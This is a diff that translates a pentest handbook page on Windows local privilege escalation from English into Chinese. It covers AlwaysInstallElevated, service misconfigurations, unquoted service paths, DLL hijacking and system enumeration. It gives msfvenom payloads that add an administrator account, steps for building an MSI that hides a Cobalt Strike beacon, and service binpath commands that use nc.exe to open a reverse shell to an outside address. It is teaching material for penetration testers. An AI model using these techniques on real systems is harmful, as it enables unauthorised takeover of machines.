+[**在这里阅读完整报告**](https://www.gosecure.net/blog/2020/09/08/wsus-attacks-part-2-cve-2020-1013-a-windows-10-local-privilege-escalation-1-day/)。\
+基本上，这是这个漏洞利用的缺陷：
 
-> If we have the power to modify our local user proxy, and Windows Updates uses the proxy configured in Internet Explorer’s settings, we therefore have the power to run [PyWSUS](https://github.com/GoSecure/pywsus) locally to intercept our own traffic and run code as an elevated user on our asset.
+> 如果我们有权修改我们的本地用户代理，并且 Windows 更新使用 Internet Explorer 设置中配置的代理，那么我们就有权在本地运行 [PyWSUS](https://github.com/GoSecure/pywsus) 来拦截我们自己的流量，并以提升的用户身份在我们的资产上运行代码。
 >
-> Furthermore, since the WSUS service uses the current user’s settings, it will also use its certificate store. If we generate a self-signed certificate for the WSUS hostname and add this certificate into the current user’s certificate store, we will be able to intercept both HTTP and HTTPS WSUS traffic. WSUS uses no HSTS-like mechanisms to implement a trust-on-first-use type validation on the certificate. If the certificate presented is trusted by the user and has the correct hostname, it will be accepted by the service.
+> 此外，由于 WSUS 服务使用当前用户的设置，它还将使用其证书存储。如果我们为 WSUS 主机名生成自签名证书并将此证书添加到当前用户的证书存储中，我们将能够拦截 HTTP 和 HTTPS WSUS 流量。WSUS 不使用 HSTS 类似机制在证书上实现首次使用信任类型的验证。如果所呈现的证书被用户信任并具有正确的主机名，它将被服务接受。
 
-You can exploit this vulnerability using the tool [**WSUSpicious**](https://github.com/GoSecure/wsuspicious) (once it's liberated).
+您可以使用工具 [**WSUSpicious**](https://github.com/GoSecure/wsuspicious) 利用此漏洞（解放后）。
 
 ## KrbRelayUp
 
-A **local privilege escalation** vulnerability exists in Windows **domain** environments under specific conditions. These conditions include environments where **LDAP signing is not enforced,** users possess self-rights allowing them to configure **Resource-Based Constrained Delegation (RBCD),** and the capability for users to create computers within the domain. It is important to note that these **requirements** are met using **default settings**.
+在特定条件下，Windows **域** 环境中存在 **本地权限提升** 漏洞。这些条件包括 **LDAP 签名未强制执行** 的环境，用户拥有自我权限，允许他们配置 **基于资源的受限委派 (RBCD)**，以及用户在域内创建计算机的能力。重要的是要注意，这些 **要求** 在 **默认设置** 下满足。
 
-Find the **exploit in** [**https://github.com/Dec0ne/KrbRelayUp**](https://github.com/Dec0ne/KrbRelayUp)
+在 [**https://github.com/Dec0ne/KrbRelayUp**](https://github.com/Dec0ne/KrbRelayUp) 中找到 **利用**。
 
-For more information about the flow of the attack check [https://research.nccgroup.com/2019/08/20/kerberos-resource-based-constrained-delegation-when-an-image-change-leads-to-a-privilege-escalation/](https://research.nccgroup.com/2019/08/20/kerberos-resource-based-constrained-delegation-when-an-image-change-leads-to-a-privilege-escalation/)
+有关攻击流程的更多信息，请查看 [https://research.nccgroup.com/2019/08/20/kerberos-resource-based-constrained-delegation-when-an-image-change-leads-to-a-privilege-escalation/](https://research.nccgroup.com/2019/08/20/kerberos-resource-based-constrained-delegation-when-an-image-change-leads-to-a-privilege-escalation/)
 
 ## AlwaysInstallElevated
 
-**If** these 2 registers are **enabled** (value is **0x1**), then users of any privilege can **install** (execute) `*.msi` files as NT AUTHORITY\\**SYSTEM**.
-
+**如果** 这两个注册表 **启用**（值为 **0x1**），则任何权限的用户都可以 **安装**（执行） `*.msi` 文件作为 NT AUTHORITY\\**SYSTEM**。
 ```bash
 reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
 reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
 ```
-
-### Metasploit payloads
-
+### Metasploit 载荷
 ```bash
 msfvenom -p windows/adduser USER=rottenadmin PASS=P@ssword123! -f msi-nouac -o alwe.msi #No uac format
 msfvenom -p windows/adduser USER=rottenadmin PASS=P@ssword123! -f msi -o alwe.msi #Using the msiexec the uac wont be prompted
 ```
-
-If you have a meterpreter session you can automate this technique using the module **`exploit/windows/local/always_install_elevated`**
+如果您有一个 meterpreter 会话，您可以使用模块 **`exploit/windows/local/always_install_elevated`** 自动化此技术。
 
 ### PowerUP
 
-Use the `Write-UserAddMSI` command from power-up to create inside the current directory a Windows MSI binary to escalate privileges. This script writes out a precompiled MSI installer that prompts for a user/group addition (so you will need GIU access):
-
+使用 power-up 中的 `Write-UserAddMSI` 命令在当前目录中创建一个 Windows MSI 二进制文件以提升权限。此脚本写出一个预编译的 MSI 安装程序，该安装程序提示添加用户/组（因此您需要 GIU 访问权限）：
 ```
 Write-UserAddMSI
 ```
-
-Just execute the created binary to escalate privileges.
+只需执行创建的二进制文件以提升权限。
 
 ### MSI Wrapper
 
-Read this tutorial to learn how to create a MSI wrapper using this tools. Note that you can wrap a "**.bat**" file if you **just** want to **execute** **command lines**
+阅读本教程以了解如何使用这些工具创建 MSI 包装器。请注意，如果您**仅**想要**执行** **命令行**，可以包装一个 "**.bat**" 文件。
 
 {{#ref}}
 msi-wrapper.md
 {{#endref}}
 
-### Create MSI with WIX
+### 使用 WIX 创建 MSI
 
 {{#ref}}
 create-msi-with-wix.md
 {{#endref}}
 
-### Create MSI with Visual Studio
+### 使用 Visual Studio 创建 MSI
 
-- **Generate** with Cobalt Strike or Metasploit a **new Windows EXE TCP payload** in `C:\privesc\beacon.exe`
-- Open **Visual Studio**, select **Create a new project** and type "installer" into the search box. Select the **Setup Wizard** project and click **Next**.
-- Give the project a name, like **AlwaysPrivesc**, use **`C:\privesc`** for the location, select **place solution and project in the same directory**, and click **Create**.
-- Keep clicking **Next** until you get to step 3 of 4 (choose files to include). Click **Add** and select the Beacon payload you just generated. Then click **Finish**.
-- Highlight the **AlwaysPrivesc** project in the **Solution Explorer** and in the **Properties**, change **TargetPlatform** from **x86** to **x64**.
-  - There are other properties you can change, such as the **Author** and **Manufacturer** which can make the installed app look more legitimate.
-- Right-click the project and select **View > Custom Actions**.
-- Right-click **Install** and select **Add Custom Action**.
-- Double-click on **Application Folder**, select your **beacon.exe** file and click **OK**. This will ensure that the beacon payload is executed as soon as the installer is run.
-- Under the **Custom Action Properties**, change **Run64Bit** to **True**.
-- Finally, **build it**.
-  - If the warning `File 'beacon-tcp.exe' targeting 'x64' is not compatible with the project's target platform 'x86'` is shown, make sure you set the platform to x64.
+- **使用** Cobalt Strike 或 Metasploit 生成一个 **新的 Windows EXE TCP 负载** 在 `C:\privesc\beacon.exe`
+- 打开 **Visual Studio**，选择 **创建新项目**，在搜索框中输入 "installer"。选择 **Setup Wizard** 项目并点击 **下一步**。
+- 给项目命名，例如 **AlwaysPrivesc**，使用 **`C:\privesc`** 作为位置，选择 **将解决方案和项目放在同一目录**，然后点击 **创建**。
+- 一直点击 **下一步**，直到到达第 3 步中的 4 步（选择要包含的文件）。点击 **添加** 并选择您刚生成的 Beacon 负载。然后点击 **完成**。
+- 在 **解决方案资源管理器** 中突出显示 **AlwaysPrivesc** 项目，在 **属性** 中，将 **TargetPlatform** 从 **x86** 更改为 **x64**。
+- 还有其他属性可以更改，例如 **作者** 和 **制造商**，这可以使安装的应用程序看起来更合法。
+- 右键单击项目并选择 **查看 > 自定义操作**。
+- 右键单击 **安装** 并选择 **添加自定义操作**。
+- 双击 **应用程序文件夹**，选择您的 **beacon.exe** 文件并点击 **确定**。这将确保在运行安装程序时立即执行 beacon 负载。
+- 在 **自定义操作属性** 下，将 **Run64Bit** 更改为 **True**。
+- 最后，**构建它**。
+- 如果显示警告 `File 'beacon-tcp.exe' targeting 'x64' is not compatible with the project's target platform 'x86'`，请确保将平台设置为 x64。
 
-### MSI Installation
-
-To execute the **installation** of the malicious `.msi` file in **background:**
+### MSI 安装
 
+要在 **后台** 执行恶意 `.msi` 文件的 **安装**：
 ```
 msiexec /quiet /qn /i C:\Users\Steve.INFERNO\Downloads\alwe.msi
 ```
+要利用此漏洞，您可以使用： _exploit/windows/local/always_install_elevated_
 
-To exploit this vulnerability you can use: _exploit/windows/local/always_install_elevated_
+## 防病毒软件和检测器
 
-## Antivirus and Detectors
-
-### Audit Settings
-
-These settings decide what is being **logged**, so you should pay attention
+### 审计设置
 
+这些设置决定了什么被**记录**，因此您应该注意。
 ```
 reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit
 ```
-
 ### WEF
 
-Windows Event Forwarding, is interesting to know where are the logs sent
-
+Windows 事件转发，了解日志发送到哪里是很有趣的
 ```bash
 reg query HKLM\Software\Policies\Microsoft\Windows\EventLog\EventForwarding\SubscriptionManager
 ```
-
 ### LAPS
 
-**LAPS** is designed for the **management of local Administrator passwords**, ensuring that each password is **unique, randomised, and regularly updated** on computers joined to a domain. These passwords are securely stored within Active Directory and can only be accessed by users who have been granted sufficient permissions through ACLs, allowing them to view local admin passwords if authorized.
+**LAPS** 旨在 **管理本地管理员密码**，确保每个密码在加入域的计算机上都是 **唯一、随机且定期更新** 的。这些密码安全地存储在 Active Directory 中，只有通过 ACL 授予足够权限的用户才能访问，从而在获得授权的情况下查看本地管理员密码。
 
 {{#ref}}
 ../active-directory-methodology/laps.md
@@ -311,45 +275,36 @@ reg query HKLM\Software\Policies\Microsoft\Windows\EventLog\EventForwarding\Subs
 
 ### WDigest
 
-If active, **plain-text passwords are stored in LSASS** (Local Security Authority Subsystem Service).\
-[**More info about WDigest in this page**](../stealing-credentials/credentials-protections.md#wdigest).
-
+如果启用，**明文密码存储在 LSASS**（本地安全授权子系统服务）中。\
+[**关于 WDigest 的更多信息请查看此页面**](../stealing-credentials/credentials-protections.md#wdigest)。
 ```bash
 reg query 'HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest' /v UseLogonCredential
 ```
+### LSA 保护
 
-### LSA Protection
-
-Starting with **Windows 8.1**, Microsoft introduced enhanced protection for the Local Security Authority (LSA) to **block** attempts by untrusted processes to **read its memory** or inject code, further securing the system.\
-[**More info about LSA Protection here**](../stealing-credentials/credentials-protections.md#lsa-protection).
-
+从 **Windows 8.1** 开始，微软引入了增强的本地安全机构 (LSA) 保护，以 **阻止** 不受信任的进程 **读取其内存** 或注入代码，从而进一步保护系统。\
+[**有关 LSA 保护的更多信息**](../stealing-credentials/credentials-protections.md#lsa-protection)。
 ```bash
 reg query 'HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA' /v RunAsPPL
 ```
-
 ### Credentials Guard
 
-**Credential Guard** wasn introduced in **Windows 10**. Its purpose is to safeguard the credentials stored on a device against threats like pass-the-hash attacks.| [**More info about Credentials Guard here.**](../stealing-credentials/credentials-protections.md#credential-guard)
-
+**Credential Guard** 于 **Windows 10** 中引入。其目的是保护存储在设备上的凭据，防止诸如传递哈希攻击等威胁。| [**有关 Credentials Guard 的更多信息。**](../stealing-credentials/credentials-protections.md#credential-guard)
 ```bash
 reg query 'HKLM\System\CurrentControlSet\Control\LSA' /v LsaCfgFlags
 ```
+### 缓存凭据
 
-### Cached Credentials
-
-**Domain credentials** are authenticated by the **Local Security Authority** (LSA) and utilized by operating system components. When a user's logon data is authenticated by a registered security package, domain credentials for the user are typically established.\
-[**More info about Cached Credentials here**](../stealing-credentials/credentials-protections.md#cached-credentials).
-
+**域凭据**由**本地安全机构**（LSA）进行验证，并被操作系统组件使用。当用户的登录数据通过注册的安全包进行验证时，通常会为该用户建立域凭据。\
+[**有关缓存凭据的更多信息**](../stealing-credentials/credentials-protections.md#cached-credentials)。
 ```bash
 reg query "HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON" /v CACHEDLOGONSCOUNT
 ```
+## 用户与组
 
-## Users & Groups
-
-### Enumerate Users & Groups
-
-You should check if any of the groups where you belong have interesting permissions
+### 枚举用户与组
 
+您应该检查您所属的任何组是否具有有趣的权限
 ```bash
 # CMD
 net users %username% #Me
@@ -364,57 +319,47 @@ Get-LocalUser | ft Name,Enabled,LastLogon
 Get-ChildItem C:\Users -Force | select Name
 Get-LocalGroupMember Administrators | ft Name, PrincipalSource
 ```
+### 特权组
 
-### Privileged groups
-
-If you **belongs to some privileged group you may be able to escalate privileges**. Learn about privileged groups and how to abuse them to escalate privileges here:
+如果您**属于某个特权组，您可能能够提升权限**。在这里了解特权组及其滥用方式以提升权限：
 
 {{#ref}}
 ../active-directory-methodology/privileged-groups-and-token-privileges.md
 {{#endref}}
 
-### Token manipulation
+### 令牌操控
 
-**Learn more** about what is a **token** in this page: [**Windows Tokens**](../authentication-credentials-uac-and-efs/#access-tokens).\
-Check the following page to **learn about interesting tokens** and how to abuse them:
+**了解更多**关于**令牌**的信息，请访问此页面：[**Windows Tokens**](../authentication-credentials-uac-and-efs/#access-tokens)。\
+查看以下页面以**了解有趣的令牌**及其滥用方式：
 
 {{#ref}}
 privilege-escalation-abusing-tokens.md
 {{#endref}}
 
-### Logged users / Sessions
-
+### 登录用户 / 会话
 ```bash
 qwinsta
 klist sessions
 ```
-
-### Home folders
-
+### 家庭文件夹
 ```powershell
 dir C:\Users
 Get-ChildItem C:\Users
 ```
-
-### Password Policy
-
+### 密码策略
 ```bash
 net accounts
 ```
-
-### Get the content of the clipboard
-
+### 获取剪贴板的内容
 ```bash
 powershell -command "Get-Clipboard"
 ```
+## 运行进程
 
-## Running Processes
-
-### File and Folder Permissions
-
-First of all, listing the processes **check for passwords inside the command line of the process**.\
-Check if you can **overwrite some binary running** or if you have write permissions of the binary folder to exploit possible [**DLL Hijacking attacks**](dll-hijacking/):
+### 文件和文件夹权限
 
+首先，列出进程 **检查进程命令行中的密码**。\
+检查您是否可以 **覆盖某个正在运行的二进制文件**，或者您是否对二进制文件夹具有写入权限，以利用可能的 [**DLL Hijacking attacks**](dll-hijacking/):
 ```bash
 Tasklist /SVC #List processes running and services
 tasklist /v /fi "username eq system" #Filter "system" processes
@@ -425,106 +370,86 @@ Get-WmiObject -Query "Select * from Win32_Process" | where {$_.Name -notlike "sv
 #Without usernames
 Get-Process | where {$_.ProcessName -notlike "svchost*"} | ft ProcessName, Id
 ```
+始终检查可能正在运行的 [**electron/cef/chromium 调试器**，您可以利用它来提升权限](../../linux-hardening/privilege-escalation/electron-cef-chromium-debugger-abuse.md)。
 
-Always check for possible [**electron/cef/chromium debuggers** running, you could abuse it to escalate privileges](../../linux-hardening/privilege-escalation/electron-cef-chromium-debugger-abuse.md).
-
-**Checking permissions of the processes binaries**
-
+**检查进程二进制文件的权限**
 ```bash
 for /f "tokens=2 delims='='" %%x in ('wmic process list full^|find /i "executablepath"^|find /i /v "system32"^|find ":"') do (
-	for /f eol^=^"^ delims^=^" %%z in ('echo %%x') do (
-		icacls "%%z"
+for /f eol^=^"^ delims^=^" %%z in ('echo %%x') do (
+icacls "%%z"
 2>nul | findstr /i "(F) (M) (W) :\\" | findstr /i ":\\ everyone authenticated users todos %username%" && echo.
-	)
+)
 )
 ```
-
-**Checking permissions of the folders of the processes binaries (**[**DLL Hijacking**](dll-hijacking/)**)**
-
+**检查进程二进制文件文件夹的权限 (**[**DLL Hijacking**](dll-hijacking/)**)**
 ```bash
 for /f "tokens=2 delims='='" %%x in ('wmic process list full^|find /i "executablepath"^|find /i /v
 "system32"^|find ":"') do for /f eol^=^"^ delims^=^" %%y in ('echo %%x') do (
-	icacls "%%~dpy\" 2>nul | findstr /i "(F) (M) (W) :\\" | findstr /i ":\\ everyone authenticated users
+icacls "%%~dpy\" 2>nul | findstr /i "(F) (M) (W) :\\" | findstr /i ":\\ everyone authenticated users
 todos %username%" && echo.
 )
 ```
+### 内存密码挖掘
 
-### Memory Password mining
-
-You can create a memory dump of a running process using **procdump** from sysinternals. Services like FTP have the **credentials in clear text in memory**, try to dump the memory and read the credentials.
-
+您可以使用来自 sysinternals 的 **procdump** 创建正在运行的进程的内存转储。像 FTP 这样的服务在内存中以 **明文形式存储凭据**，尝试转储内存并读取凭据。
 ```bash
 procdump.exe -accepteula -ma <proc_name_tasklist>
 ```
+### 不安全的 GUI 应用程序
 
-### Insecure GUI apps
+**以 SYSTEM 身份运行的应用程序可能允许用户生成 CMD 或浏览目录。**
 
-**Applications running as SYSTEM may allow an user to spawn a CMD, or browse directories.**
+示例：“Windows 帮助和支持”（Windows + F1），搜索“命令提示符”，点击“点击打开命令提示符”
 
-Example: "Windows Help and Support" (Windows + F1), search for "command prompt", click on "Click to open Command Prompt"
-
-## Services
-
-Get a list of services:
+## 服务
 
+获取服务列表：
 ```bash
 net start
 wmic service list brief
 sc query
 Get-Service
 ```
+### 权限
 
-### Permissions
-
-You can use **sc** to get information of a service
-
+您可以使用 **sc** 获取服务的信息
 ```bash
 sc qc <service_name>
 ```
-
-It is recommended to have the binary **accesschk** from _Sysinternals_ to check the required privilege level for each service.
-
+建议使用来自 _Sysinternals_ 的二进制文件 **accesschk** 来检查每个服务所需的权限级别。
 ```bash
 accesschk.exe -ucqv <Service_Name> #Check rights for different groups
 ```
-
-It is recommended to check if "Authenticated Users" can modify any service:
-
+建议检查“认证用户”是否可以修改任何服务：
 ```bash
 accesschk.exe -uwcqv "Authenticated Users" * /accepteula
 accesschk.exe -uwcqv %USERNAME% * /accepteula
 accesschk.exe -uwcqv "BUILTIN\Users" * /accepteula 2>nul
 accesschk.exe -uwcqv "Todos" * /accepteula ::Spanish version
 ```
+[您可以在此处下载适用于XP的accesschk.exe](https://github.com/ankh2054/windows-pentest/raw/master/Privelege/accesschk-2003-xp.exe)
 
-[You can download accesschk.exe for XP for here](https://github.com/ankh2054/windows-pentest/raw/master/Privelege/accesschk-2003-xp.exe)
+### 启用服务
 
-### Enable service
+如果您遇到此错误（例如与SSDPSRV）：
 
-If you are having this error (for example with SSDPSRV):
-
-_System error 1058 has occurred._\
-&#xNAN;_&#x54;he service cannot be started, either because it is disabled or because it has no enabled devices associated with it._
-
-You can enable it using
+_系统错误 1058 已发生。_\
+&#xNAN;_&#x54;该服务无法启动，可能是因为它被禁用或没有启用的设备与之关联。_
 
+您可以使用以下方法启用它：
 ```bash
 sc config SSDPSRV start= demand
 sc config SSDPSRV obj= ".\LocalSystem" password= ""
 ```
+**请注意，服务 upnphost 依赖于 SSDPSRV 才能工作（适用于 XP SP1）**
 
-**Take into account that the service upnphost depends on SSDPSRV to work (for XP SP1)**
-
-**Another workaround** of this problem is running:
-
+**此问题的另一种解决方法**是运行：
 ```
 sc.exe config usosvc start= auto
 ```
+### **修改服务二进制路径**
 
-### **Modify service binary path**
-
-In the scenario where the "Authenticated users" group possesses **SERVICE_ALL_ACCESS** on a service, modification of the service's executable binary is possible. To modify and execute **sc**:
-
+在“经过身份验证的用户”组拥有 **SERVICE_ALL_ACCESS** 权限的服务场景中，可以修改服务的可执行二进制文件。要修改并执行 **sc**：
 ```bash
 sc config <Service_Name> binpath= "C:\nc.exe -nv 127.0.0.1 9988 -e C:\WINDOWS\System32\cmd.exe"
 sc config <Service_Name> binpath= "net localgroup administrators username /add"
@@ -532,48 +457,40 @@ sc config <Service_Name> binpath= "cmd \c C:\Users\nc.exe 10.10.10.10 4444 -e cm
 
 sc config SSDPSRV binpath= "C:\Documents and Settings\PEPE\meter443.exe"
 ```
-
-### Restart service
-
+### 重启服务
 ```bash
 wmic service NAMEOFSERVICE call startservice
 net stop [service name] && net start [service name]
 ```
+权限可以通过各种权限提升：
 
-Privileges can be escalated through various permissions:
+- **SERVICE_CHANGE_CONFIG**: 允许重新配置服务二进制文件。
+- **WRITE_DAC**: 启用权限重新配置，从而能够更改服务配置。
+- **WRITE_OWNER**: 允许获取所有权和权限重新配置。
+- **GENERIC_WRITE**: 继承更改服务配置的能力。
+- **GENERIC_ALL**: 也继承更改服务配置的能力。
 
-- **SERVICE_CHANGE_CONFIG**: Allows reconfiguration of the service binary.
-- **WRITE_DAC**: Enables permission reconfiguration, leading to the ability to change service configurations.
-- **WRITE_OWNER**: Permits ownership acquisition and permission reconfiguration.
-- **GENERIC_WRITE**: Inherits the ability to change service configurations.
-- **GENERIC_ALL**: Also inherits the ability to change service configurations.
+对于此漏洞的检测和利用，可以使用 _exploit/windows/local/service_permissions_。
 
-For the detection and exploitation of this vulnerability, the _exploit/windows/local/service_permissions_ can be utilized.
-
-### Services binaries weak permissions
-
-**Check if you can modify the binary that is executed by a service** or if you have **write permissions on the folder** where the binary is located ([**DLL Hijacking**](dll-hijacking/))**.**\
-You can get every binary that is executed by a service using **wmic** (not in system32) and check your permissions using **icacls**:
+### 服务二进制文件的弱权限
 
+**检查您是否可以修改由服务执行的二进制文件**，或者您是否在二进制文件所在的文件夹中具有**写权限**（[**DLL Hijacking**](dll-hijacking/)）**。**\
+您可以使用 **wmic**（不在 system32 中）获取由服务执行的每个二进制文件，并使用 **icacls** 检查您的权限：
 ```bash
 for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a >> %temp%\perm.txt
 
 for /f eol^=^"^ delims^=^" %a in (%temp%\perm.txt) do cmd.exe /c icacls "%a" 2>nul | findstr "(M) (F) :\"
 ```
-
-You can also use **sc** and **icacls**:
-
+您还可以使用 **sc** 和 **icacls**：
 ```bash
 sc query state= all | findstr "SERVICE_NAME:" >> C:\Temp\Servicenames.txt
 FOR /F "tokens=2 delims= " %i in (C:\Temp\Servicenames.txt) DO @echo %i >> C:\Temp\services.txt
 FOR /F %i in (C:\Temp\services.txt) DO @sc qc %i | findstr "BINARY_PATH_NAME" >> C:\Temp\path.txt
 ```
+### 服务注册表修改权限
 
-### Services registry modify permissions
-
-You should check if you can modify any service registry.\
-You can **check** your **permissions** over a service **registry** doing:
-
+您应该检查是否可以修改任何服务注册表。\
+您可以通过以下方式**检查**您对服务**注册表**的**权限**：
 ```bash
 reg query hklm\System\CurrentControlSet\Services /s /v imagepath #Get the binary paths of the services
 
@@ -582,37 +499,31 @@ for /f %a in ('reg query hklm\system\currentcontrolset\services') do del %temp%\
 
 get-acl HKLM:\System\CurrentControlSet\services\* | Format-List * | findstr /i "<Username> Users Path Everyone"
 ```
+应检查**Authenticated Users**或**NT AUTHORITY\INTERACTIVE**是否拥有`FullControl`权限。如果是，则可以更改服务执行的二进制文件。
 
-It should be checked whether **Authenticated Users** or **NT AUTHORITY\INTERACTIVE** possess `FullControl` permissions. If so, the binary executed by the service can be altered.
-
-To change the Path of the binary executed:
-
+要更改执行的二进制文件的路径：
 ```bash
 reg add HKLM\SYSTEM\CurrentControlSet\services\<service_name> /v ImagePath /t REG_EXPAND_SZ /d C:\path\new\binary /f
 ```
+### 服务注册表 AppendData/AddSubdirectory 权限
 
-### Services registry AppendData/AddSubdirectory permissions
-
-If you have this permission over a registry this means to **you can create sub registries from this one**. In case of Windows services this is **enough to execute arbitrary code:**
+如果您对注册表具有此权限，这意味着**您可以从此注册表创建子注册表**。在 Windows 服务的情况下，这**足以执行任意代码：**
 
 {{#ref}}
 appenddata-addsubdirectory-permission-over-service-registry.md
 {{#endref}}
 
-### Unquoted Service Paths
+### 未加引号的服务路径
 
-If the path to an executable is not inside quotes, Windows will try to execute every ending before a space.
-
-For example, for the path _C:\Program Files\Some Folder\Service.exe_ Windows will try to execute:
+如果可执行文件的路径没有用引号括起来，Windows 将尝试执行每个在空格之前的结尾。
 
+例如，对于路径 _C:\Program Files\Some Folder\Service.exe_，Windows 将尝试执行：
 ```powershell
 C:\Program.exe
 C:\Program Files\Some.exe
 C:\Program Files\Some Folder\Service.exe
 ```
-
-List all unquoted service paths, excluding those belonging to built-in Windows services:
-
+列出所有未加引号的服务路径，排除属于内置Windows服务的路径：
 ```powershell
 wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v '\"'
 wmic service get name,displayname,pathname,startmode | findstr /i /v "C:\\Windows\\system32\\" |findstr /i /v '\"'  # Not only auto services
@@ -623,32 +534,28 @@ Get-ServiceUnquoted -Verbose
 
 ```powershell
 for /f "tokens=2" %%n in ('sc query state^= all^| findstr SERVICE_NAME') do (
-	for /f "delims=: tokens=1*" %%r in ('sc qc "%%~n" ^| findstr BINARY_PATH_NAME ^| findstr /i /v /l /c:"c:\windows\system32" ^| findstr /v /c:""""') do (
-		echo %%~s | findstr /r /c:"[a-Z][ ][a-Z]" >nul 2>&1 && (echo %%n && echo %%~s && icacls %%s | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%") && echo.
-	)
+for /f "delims=: tokens=1*" %%r in ('sc qc "%%~n" ^| findstr BINARY_PATH_NAME ^| findstr /i /v /l /c:"c:\windows\system32" ^| findstr /v /c:""""') do (
+echo %%~s | findstr /r /c:"[a-Z][ ][a-Z]" >nul 2>&1 && (echo %%n && echo %%~s && icacls %%s | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%") && echo.
+)
 )
 ```
 
 ```powershell
 gwmi -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq "Auto" -and $_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select PathName,DisplayName,Name
 ```
-
-**You can detect and exploit** this vulnerability with metasploit: `exploit/windows/local/trusted\_service\_path` You can manually create a service binary with metasploit:
-
+**您可以使用** metasploit 检测和利用此漏洞： `exploit/windows/local/trusted\_service\_path` 您可以使用 metasploit 手动创建服务二进制文件：
 ```bash
 msfvenom -p windows/exec CMD="net localgroup administrators username /add" -f exe-service -o service.exe
 ```
+### 恢复操作
 
-### Recovery Actions
+Windows 允许用户指定在服务失败时采取的操作。此功能可以配置为指向一个二进制文件。如果这个二进制文件是可替换的，可能会实现权限提升。更多细节可以在 [官方文档](<https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/cc753662(v=ws.11)?redirectedfrom=MSDN>) 中找到。
 
-Windows allows users to specify actions to be taken if a service fails. This feature can be configured to point to a binary. If this binary is replaceable, privilege escalation might be possible. More details can be found in the [official documentation](<https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/cc753662(v=ws.11)?redirectedfrom=MSDN>).
+## 应用程序
 
-## Applications
-
-### Installed Applications
-
-Check **permissions of the binaries** (maybe you can overwrite one and escalate privileges) and of the **folders** ([DLL Hijacking](dll-hijacking/)).
+### 已安装的应用程序
 
+检查 **二进制文件的权限**（也许你可以覆盖一个并提升权限）和 **文件夹** ([DLL Hijacking](dll-hijacking/))。
 ```bash
 dir /a "C:\Program Files"
 dir /a "C:\Program Files (x86)"
@@ -657,13 +564,11 @@ reg query HKEY_LOCAL_MACHINE\SOFTWARE
 Get-ChildItem 'C:\Program Files', 'C:\Program Files (x86)' | ft Parent,Name,LastWriteTime
 Get-ChildItem -path Registry::HKEY_LOCAL_MACHINE\SOFTWARE | ft Name
 ```
+### 写入权限
 
-### Write Permissions
-
-Check if you can modify some config file to read some special file or if you can modify some binary that is going to be executed by an Administrator account (schedtasks).
-
-A way to find weak folder/files permissions in the system is doing:
+检查您是否可以修改某个配置文件以读取某个特殊文件，或者您是否可以修改将由管理员帐户（schedtasks）执行的某个二进制文件。
 
+查找系统中弱文件夹/文件权限的一种方法是：
 ```bash
 accesschk.exe /accepteula
 # Find all weak folder permissions per drive.
@@ -686,46 +591,40 @@ Get-ChildItem 'C:\Program Files\*','C:\Program Files (x86)\*' | % { try { Get-Ac
 
 Get-ChildItem 'C:\Program Files\*','C:\Program Files (x86)\*' | % { try { Get-Acl $_ -EA SilentlyContinue | Where {($_.Access|select -ExpandProperty IdentityReference) -match 'BUILTIN\Users'} } catch {}}
 ```
+### 开机时运行
 
-### Run at startup
-
-**Check if you can overwrite some registry or binary that is going to be executed by a different user.**\
-**Read** the **following page** to learn more about interesting **autoruns locations to escalate privileges**:
+**检查您是否可以覆盖某些将由其他用户执行的注册表或二进制文件。**\
+**阅读**以下页面以了解有关有趣的**自动运行位置以提升权限**的更多信息：
 
 {{#ref}}
 privilege-escalation-with-autorun-binaries.md
 {{#endref}}
 
-### Drivers
-
-Look for possible **third party weird/vulnerable** drivers
+### 驱动程序
 
+寻找可能的**第三方奇怪/易受攻击**驱动程序
 ```bash
 driverquery
 driverquery.exe /fo table
 driverquery /SI
 ```
+## PATH DLL 劫持
 
-## PATH DLL Hijacking
-
-If you have **write permissions inside a folder present on PATH** you could be able to hijack a DLL loaded by a process and **escalate privileges**.
-
-Check permissions of all folders inside PATH:
+如果您在 PATH 中的某个文件夹内具有 **写入权限**，您可能能够劫持由进程加载的 DLL 并 **提升权限**。
 
+检查 PATH 中所有文件夹的权限：
 ```bash
 for %%A in ("%path:;=";"%") do ( cmd.exe /c icacls "%%~A" 2>nul | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%" && echo. )
 ```
-
-For more information about how to abuse this check:
+有关如何滥用此检查的更多信息，请参见：
 
 {{#ref}}
 dll-hijacking/writable-sys-path-+dll-hijacking-privesc.md
 {{#endref}}
 
-## Network
-
-### Shares
+## 网络
 
+### 共享
 ```bash
 net view #Get a list of computers
 net view /all /domain [domainname] #Shares on the domains
@@ -733,77 +632,61 @@ net view \\computer /ALL #List shares of a computer
 net use x: \\computer\share #Mount the share locally
 net share #Check current shares
 ```
+### hosts 文件
 
-### hosts file
-
-Check for other known computers hardcoded on the hosts file
-
+检查 hosts 文件中硬编码的其他已知计算机
 ```
 type C:\Windows\System32\drivers\etc\hosts
 ```
-
-### Network Interfaces & DNS
-
+### 网络接口与DNS
 ```
 ipconfig /all
 Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address
 Get-DnsClientServerAddress -AddressFamily IPv4 | ft
 ```
+### 开放端口
 
-### Open Ports
-
-Check for **restricted services** from the outside
-
+检查外部的 **受限服务**
 ```bash
 netstat -ano #Opened ports?
 ```
-
-### Routing Table
-
+### 路由表
 ```
 route print
 Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric,ifIndex
 ```
-
-### ARP Table
-
+### ARP 表
 ```
 arp -A
